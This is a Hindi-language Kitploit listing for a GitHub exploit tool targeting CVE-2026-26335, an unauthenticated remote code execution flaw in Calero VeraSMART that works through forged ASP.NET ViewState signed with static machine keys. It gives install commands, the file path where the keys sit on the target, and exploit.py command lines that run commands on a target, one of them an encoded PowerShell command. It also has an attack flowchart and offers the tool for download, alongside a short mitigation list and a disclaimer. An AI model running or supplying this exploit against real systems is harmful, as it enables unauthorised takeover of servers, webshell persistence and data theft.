Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-26335-Calero-VeraSMART-RCE — # CVE-2026-26335 के लिए स्वचालित एक्सप्लॉइट, Calero VeraSMART में एक गंभीर बिना प्रमाणीकरण वाला RCE, जो स्थिर मशीन कुंजियों का उपयोग करके जाली ASP.NET ViewState के माध्यम से होता है। इसमें एंडपॉइंट खोज, पेलोड निर्माण और कमांड निष्पादन शामिल है। | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2026-26335-calero-verasmart-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmbanyamer/cve-2026-26335-calero-verasmart-rce

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

CVE-2026-26335-Calero-VeraSMART-RCE

# CVE-2026-26335 के लिए स्वचालित एक्सप्लॉइट, Calero VeraSMART में एक गंभीर बिना प्रमाणीकरण वाला RCE, जो स्थिर मशीन कुंजियों का उपयोग करके जाली ASP.NET ViewState के माध्यम से होता है। इसमें एंडपॉइंट खोज, पेलोड निर्माण और कमांड निष्पादन शामिल है।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

👤 लेखक

मोहम्मद इदरीस बन्यामेर सुरक्षा शोधकर्ता

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

CVE-2026-26335 - Calero VeraSMART ViewState RCE एक्सप्लॉइट

CVE Severity CVSS Platform ASP.NET Python License Author


📌 विवरण

CVE‑2026‑26335 Calero VeraSMART (पूर्व‑2022 R1) में एक गंभीर बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन (RCE) भेद्यता है।

एप्लिकेशन सभी इंस्टॉलेशनों में साझा किए गए स्थिर हार्ड‑कोडेड ASP.NET मशीन कुंजियों का उपयोग करता है।
इन कुंजियों वाला एक हमलावर दुर्भावनापूर्ण ASP.NET ViewState बना सकता है और सर्वर‑साइड डिसीरियलाइज़ेशन → RCE ट्रिगर कर सकता है।

यह एक्सप्लॉइट स्वचालित करता है:

  • ViewState एंडपॉइंट खोज
  • __VIEWSTATEGENERATOR निष्कर्षण
  • ysoserial पेलोड निर्माण
  • हस्ताक्षरित ViewState वितरण
  • कमांड निष्पादन

⚠️ प्रभाव

  • बिना प्रमाणीकरण वाला RCE
  • IIS उपयोगकर्ता से समझौता
  • डोमेन पार्श्व गति (lateral movement)
  • डेटा बहिर्गमन (exfiltration)
  • वेबशेल के माध्यम से स्थायित्व (persistence)

🧠 मूल कारण

CWE‑321 — हार्ड‑कोडेड क्रिप्टोग्राफ़िक कुंजियाँ

VeraSMART डिप्लॉयमेंट समान ASP.NET machineKey का पुनः उपयोग करते हैं:

root@kitploit:~
<machineKey validationKey="STATIC_KEY"
           decryptionKey="STATIC_KEY"
           validation="SHA1"
           decryption="AES" />

एक इंस्टॉलेशन से कुंजियाँ रखने वाला कोई भी हमलावर सभी पर हमला कर सकता है।


🛠 आवश्यकताएँ

  • Python 3
  • ysoserial.net
  • VeraSMART मशीन कुंजियाँ
  • IIS तक नेटवर्क पहुँच

⚙️ इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe

🔑 मशीन कुंजियाँ प्राप्त करना

कुंजियाँ सार्वजनिक नहीं हैं। लक्ष्य से प्राप्त करें:

root@kitploit:~
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config

या साथी फ़ाइल‑रीड के माध्यम से:

CVE‑2026‑26333


🚀 उपयोग

भेद्यता जाँचें

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v

कमांड निष्पादित करें

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"

विशिष्ट एंडपॉइंट

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="

प्रॉक्सी डिबगिंग

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v

📡 एक्सप्लॉइटेशन प्रवाह

  1. ViewState एंडपॉइंट खोजें
  2. जनरेटर निकालें
  3. हस्ताक्षरित पेलोड बनाएँ
  4. जाली ViewState भेजें
  5. ASP.NET डिसीरियलाइज़ेशन
  6. कमांड निष्पादन

📊 CVSS

9.8 — गंभीर AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


🧪 परीक्षण किया गया

  • VeraSMART 2020
  • VeraSMART 2021
  • VeraSMART 2022 (पूर्व‑R1)
  • Windows Server 2016/2019
  • IIS 10
  • ASP.NET 4.x

🔒 शमन (Mitigation)

VeraSMART 2022 R1 में ठीक किया गया:

  • अद्वितीय मशीन कुंजियाँ
  • ViewState सख्तीकरण (hardening)
  • सुरक्षित कुंजी भंडारण

कार्यवाहक उपाय (Workarounds):

  • machineKey घुमाएँ
  • ViewState अक्षम करें
  • IIS एक्सपोज़र प्रतिबंधित करें
  • WAF ViewState नियम

📚 संदर्भ

  • https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
  • https://www.calero.com/

⚖️ अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण के लिए। केवल उन्हीं सिस्टमों पर उपयोग करें जिनके स्वामी आप हैं या जिनका मूल्यांकन करने की अनुमति आपके पास है।


👤 लेखक

मोहम्मद इदरीस बन्यामेर सुरक्षा शोधकर्ता

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

📊 एक्सप्लॉइट आरेख

निम्नलिखित आरेख Calero VeraSMART में CVE‑2026‑26335 की एक्सप्लॉइटेशन श्रृंखला को दर्शाता है, जहाँ स्थिर ASP.NET मशीन कुंजियाँ दुर्भावनापूर्ण ViewState बनाने की अनुमति देती हैं जिससे रिमोट कोड निष्पादन होता है।

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Obtain VeraSMART machineKey]
    B --> C[Discover ViewState endpoint]
    C --> D[Extract __VIEWSTATEGENERATOR]
    D --> E[Generate malicious ViewState via ysoserial]
    E --> F[Sign payload with machineKey]
    F --> G[Send forged POST request]
    G --> H[ASP.NET ViewState deserialization]
    H --> I[TypeConfuseDelegate gadget]
    I --> J[Remote Code Execution on IIS]
टूल डाउनलोड करें